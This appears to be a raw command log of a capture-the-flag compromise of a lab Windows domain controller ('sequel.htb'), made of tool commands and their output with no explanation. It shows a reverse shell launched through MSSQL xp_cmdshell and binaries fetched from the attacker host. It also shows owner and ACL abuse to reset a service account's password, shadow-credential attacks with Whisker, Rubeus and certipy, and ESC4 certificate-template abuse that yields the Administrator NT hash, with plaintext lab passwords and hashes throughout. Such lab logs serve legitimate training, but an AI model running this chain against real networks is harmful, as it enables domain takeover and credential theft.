└─$ netexec mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth -x 'powershell -e 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'
MSSQL 10.10.11.51 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb)
MSSQL 10.10.11.51 1433 DC01 [+] DC01\sa:MSSQLP@ssw0rd! (Pwn3d!)
[14:42:23] ERROR Error when attempting to execute command via xp_cmdshell: timed out
---
└─$ listen 4445
Ncat: Connection from 10.10.11.51:50320.
PS C:\Windows\system32> whoami /all
User Name SID
============== ============================================
sequel\sql_svc S-1-5-21-548670397-972687484-3496335370-1122
Group Name Type SID Attributes
========================================== ================ =============================================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT SERVICE\MSSQL$SQLEXPRESS Well-known group S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133 Enabled by default, Enabled group, Group owner
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
SEQUEL\SQLServer2005SQLBrowserUser$DC01 Alias S-1-5-21-548670397-972687484-3496335370-1128 Mandatory group, Enabled by default, Enabled group, Local Group
SEQUEL\SQLRUserGroupSQLEXPRESS Alias S-1-5-21-548670397-972687484-3496335370-1129 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\High Mandatory Level Label S-1-16-12288
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\Users\sql_svc\Music> curl.exe --version
curl 8.9.1 (Windows) libcurl/8.9.1 Schannel zlib/1.3 WinIDN
Release-Date: 2024-07-31
Protocols: dict file ftp ftps http https imap imaps ipfs ipns mqtt pop3 pop3s smb smbs smtp smtps telnet tftp
Features: alt-svc AsynchDNS HSTS HTTPS-proxy IDN IPv6 Kerberos Largefile libz NTLM SPNEGO SSL SSPI threadsafe Unicode UnixSockets
PS C:\Users\sql_svc\Music> curl.exe 10.10.14.47/wp.exe -O
PS C:\Users\sql_svc\Music> .\wp.exe | tee -filepath wp.log
...
------------ Checking KrbRelayUp
- https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#krbrelayup
The system is inside a domain (SEQUEL) so it could be vulnerable.
- You can try https://github.com/Dec0ne/KrbRelayUp to escalate privileges
...
------------ Logged users
NT SERVICE\MSSQLFDLauncher$SQLEXPRESS
NT SERVICE\SQLTELEMETRY$SQLEXPRESS
SEQUEL\Administrator
SEQUEL\sql_svc
SEQUEL\ryan
...
------------ Home folders found
C:\Users\Administrator
C:\Users\All Users
C:\Users\Default
C:\Users\Default User
C:\Users\Public : Service [WriteData/CreateFiles]
C:\Users\ryan
C:\Users\sql_svc : sql_svc [AllAccess]
...
------------ Modifiable Services
- Check if you can modify any service https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
LOOKS LIKE YOU CAN MODIFY OR START/STOP SOME SERVICE/s:
RmSvc: GenericExecute (Start/Stop)
ConsentUxUserSvc_581e8: GenericExecute (Start/Stop)
DevicePickerUserSvc_581e8: GenericExecute (Start/Stop)
serSvc_581e8: GenericExecute (Start/Stop)
PimIndexMaintenanceSvc_581e8: GenericExecute (Start/Stop)
PrintWorkflowUserSvc_581e8: GenericExecute (Start/Stop)
UnistoreSvc_581e8: GenericExecute (Start/Stop)
UserDataSvc_581e8: GenericExecute (Start/Stop)
WpnUserService_581e8: GenericExecute (Start/Stop)
...
└─$ evil-winrm -i sequal.htb -u ryan -p WqSZAF6CysDQbGb3
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all
User Name SID
=========== ============================================
sequel\ryan S-1-5-21-548670397-972687484-3496335370-1114
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
SEQUEL\Management Department Group S-1-5-21-548670397-972687484-3496335370-1602 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
(LDAPS)-[DC01.sequel.htb]-[SEQUEL\ryan]
PV > Set-DomainObjectOwner -TargetIdentity ca_svc -PrincipalIdentity ryan
[2025-01-11 16:13:22] [Set-DomainObjectOwner] Changing current owner S-1-5-21-548670397-972687484-3496335370-512 to S-1-5-21-548670397-972687484-3496335370-1114
[2025-01-11 16:13:22] [Set-DomainObjectOwner] Success! modified owner for CN=Certification Authority,CN=Users,DC=sequel,DC=htb
(LDAPS)-[DC01.sequel.htb]-[SEQUEL\ryan]
PV > Add-DomainObjectAcl -PrincipalIdentity ryan -TargetIdentity ca_svc -Rights fullcontrol
[2025-01-11 16:13:22] [Add-DomainObjectACL] Found target identity: CN=Certification Authority,CN=Users,DC=sequel,DC=htb
[2025-01-11 16:13:22] [Add-DomainObjectACL] Found principal identity: CN=Ryan Howard,CN=Users,DC=sequel,DC=htb
[2025-01-11 16:13:22] Adding FullControl to S-1-5-21-548670397-972687484-3496335370-1607
[2025-01-11 16:13:23] DACL modified successfully!
(LDAPS)-[DC01.sequel.htb]-[SEQUEL\ryan]
PV > Set-DomainUserPassword -Identity ca_svc -AccountPassword 'Password123$'
[2025-01-11 16:13:23] [Set-DomainUserPassword] Principal CN=Certification Authority,CN=Users,DC=sequel,DC=htb found in domain
[2025-01-11 16:13:23] [Set-DomainUserPassword] Password has been successfully changed for user ca_svc
[2025-01-11 16:13:23] Password changed for ca_svc
bloodyAD --host "10.129.128.217" -d "sequal.htb" -u "ryan" -p "WqSZAF6CysDQbGb3" set owner ca_svc ryan
bloodyAD --host "10.129.128.217" -d "sequal.htb" -u "ryan" -p "WqSZAF6CysDQbGb3" add genericAll ca_svc ryan
# bloodyAD --host "10.129.128.217" -d "sequal.htb" -u "ryan" -p "WqSZAF6CysDQbGb3" set password "ca_svc" 'Password123$'
└─$ curl -LOs https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/Whisker.exe
└─$ curl -LOs https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/Rubeus.exe
---
*Evil-WinRM* PS C:\Users\ryan\Music> curl.exe 10.10.14.97/Whisker.exe -O
*Evil-WinRM* PS C:\Users\ryan\Music> curl.exe 10.10.14.97/Rubeus.exe -O
*Evil-WinRM* PS C:\Users\ryan\Music> .\Whisker.exe add /target:ca_svc
[*] No path was provided. The certificate will be printed as a Base64 blob
[*] No pass was provided. The certificate will be stored with the password JSVbHTvuGtaRz03f
[*] Searching for the target account
[*] Target user found: CN=Certification Authority,CN=Users,DC=sequel,DC=htb
[*] Generating certificate
[*] Certificate generaged
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID 44ed67c4-b31e-4db2-91c8-4d37c1e70bce
[*] Updating the msDS-KeyCredentialLink attribute of the target object
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] You can now run Rubeus with the following syntax:
Rubeus.exe asktgt /user:ca_svc /certificate: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 /password:"JSVbHTvuGtaRz03f" /domain:sequel.htb /dc:DC01.sequel.htb /getcredentials /show
*Evil-WinRM* PS C:\Users\ryan\Music> .\Rubeus.exe asktgt /user:ca_svc /certificate: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 /password:"JSVbHTvuGtaRz03f" /domain:sequel.htb /dc:DC01.sequel.htb /getcredentials /show
v2.2.0
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=ca_svc
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\ca_svc'
[*] Using domain controller: ::1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
ServiceName : krbtgt/sequel.htb
ServiceRealm : SEQUEL.HTB
UserName : ca_svc
UserRealm : SEQUEL.HTB
StartTime : 1/11/2025 2:41:21 PM
EndTime : 1/12/2025 12:41:21 AM
RenewTill : 1/18/2025 2:41:21 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : lo8/xlwCye/tUGmXxWbEyA==
ASREP (key) : 97A5B84E9E715B3F8C0C2EAB6E56DBCB
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : 3B181B914E7A9D5508EA1E20BC2B7FCE
└─$ certipy-ad shadow auto -u 'ryan@sequel.htb' -p 'WqSZAF6CysDQbGb3' -account ca_svc -target sequel.htb -dc-ip 10.129.164.144
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '105debfa-0570-7a0f-d577-cfb215902484'
[*] Adding Key Credential with device ID '105debfa-0570-7a0f-d577-cfb215902484' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID '105debfa-0570-7a0f-d577-cfb215902484' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: ca_svc@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': 3b181b914e7a9d5508ea1e20bc2b7fce
└─$ certipy-ad find -vulnerable -u 'ca_svc@sequal.htb' -hashes '3B181B914E7A9D5508EA1E20BC2B7FCE' -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: Could not connect: [Errno 113] No route to host
[*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via RRP: [Errno Connection error (10.129.228.253:445)] [Errno 113] No route to host
[!] Failed to get CA configuration for 'sequel-DC01-CA'
[!] Got error while trying to check for web enrollment: [Errno 113] No route to host
[*] Enumeration output:
Certificate Authorities
0
CA Name : sequel-DC01-CA
DNS Name : DC01.sequel.htb
Certificate Subject : CN=sequel-DC01-CA, DC=sequel, DC=htb
Certificate Serial Number : 152DBD2D8E9C079742C0F3BFF2A211D3
Certificate Validity Start : 2024-06-08 16:50:40+00:00
Certificate Validity End : 2124-06-08 17:00:40+00:00
Web Enrollment : Disabled
User Specified SAN : Unknown
Request Disposition : Unknown
Enforce Encryption for Requests : Unknown
Certificate Templates
0
Template Name : DunderMifflinAuthentication
Display Name : Dunder Mifflin Authentication
Certificate Authorities : sequel-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectRequireCommonName
SubjectAltRequireDns
Enrollment Flag : AutoEnrollment
PublishToDs
Private Key Flag : 16842752
Extended Key Usage : Client Authentication
Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1000 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Object Control Permissions
Owner : SEQUEL.HTB\Enterprise Admins
Full Control Principals : SEQUEL.HTB\Cert Publishers
Write Owner Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
Write Dacl Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
Write Property Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
[!] Vulnerabilities
ESC4 : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions
certipy-ad template -username 'ca_svc@sequal.htb' -hashes ':3B181B914E7A9D5508EA1E20BC2B7FCE' -template DunderMifflinAuthentication -save-old
certipy-ad template -username 'ca_svc@sequal.htb' -hashes ':3B181B914E7A9D5508EA1E20BC2B7FCE' -template DunderMifflinAuthentication
certipy-ad req -username 'ca_svc@sequal.htb' -hashes ':3B181B914E7A9D5508EA1E20BC2B7FCE' -ca sequel-DC01-CA -target dc01.sequal.htb -template DunderMifflinAuthentication -upn administrator@sequal.htb -timeout 1000
certipy-ad auth -pfx administrator.pfx -username 'Administrator' -domain sequal.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Saved old configuration for 'DunderMifflinAuthentication' to 'DunderMifflinAuthentication.json'
[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Successfully updated 'DunderMifflinAuthentication'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Successfully updated 'DunderMifflinAuthentication'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 8
[*] Got certificate with UPN 'administrator@sequal.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequal.htb
[*] Trying to get TGT...
[-] Wrong domain name specified 'sequal.htb'
[-] Verify that the domain 'sequal.htb' matches the certificate UPN: administrator@sequal.htb
└─$ certipy-ad template -username 'ca_svc@sequel.htb' -hashes ':3B181B914E7A9D5508EA1E20BC2B7FCE' -template DunderMifflinAuthentication -save-old
certipy-ad template -username 'ca_svc@sequel.htb' -hashes ':3B181B914E7A9D5508EA1E20BC2B7FCE' -template DunderMifflinAuthentication
certipy-ad req -username 'ca_svc@sequel.htb' -hashes ':3B181B914E7A9D5508EA1E20BC2B7FCE' -ca sequel-DC01-CA -target dc01.sequel.htb -template DunderMifflinAuthentication -upn administrator@sequel.htb -timeout 100
certipy-ad auth -pfx administrator.pfx -username 'Administrator' -domain sequel.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Saved old configuration for 'DunderMifflinAuthentication' to 'DunderMifflinAuthentication.json'
[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Successfully updated 'DunderMifflinAuthentication'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Successfully updated 'DunderMifflinAuthentication'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff